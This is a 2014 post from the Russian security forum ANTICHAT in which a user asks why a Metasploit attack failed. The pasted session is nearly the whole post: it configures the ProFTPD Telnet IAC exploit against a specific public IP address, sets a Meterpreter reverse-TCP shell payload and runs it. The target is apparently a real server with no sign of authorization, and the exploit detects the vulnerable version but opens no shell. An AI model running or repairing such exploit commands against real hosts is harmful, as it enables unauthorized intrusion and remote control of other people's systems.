HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2014, 01:50
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию

Что не так?

Код:
Code:
msf > use linux/ftp/proftp_telnet_iac 
msf  exploit(proftp_telnet_iac) > set RHOST 213.239.235.179 
RHOST => 213.239.235.179 
msf  exploit(proftp_telnet_iac) > set RPORT 21 
RPORT => 21 
msf  exploit(proftp_telnet_iac) > set TARGET 0 
TARGET => 0 
msf  exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp 
msf  exploit(proftp_telnet_iac) > set LHOST 192.168.1.4 
LHOST => 192.168.1.4 
msf  exploit(proftp_telnet_iac) > exploit[*] Started reverse handler on 192.168.1.4:4444[*] Automatically detecting the target... [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179][*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1 
msf  exploit(proftp_telnet_iac) >
И всё((
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ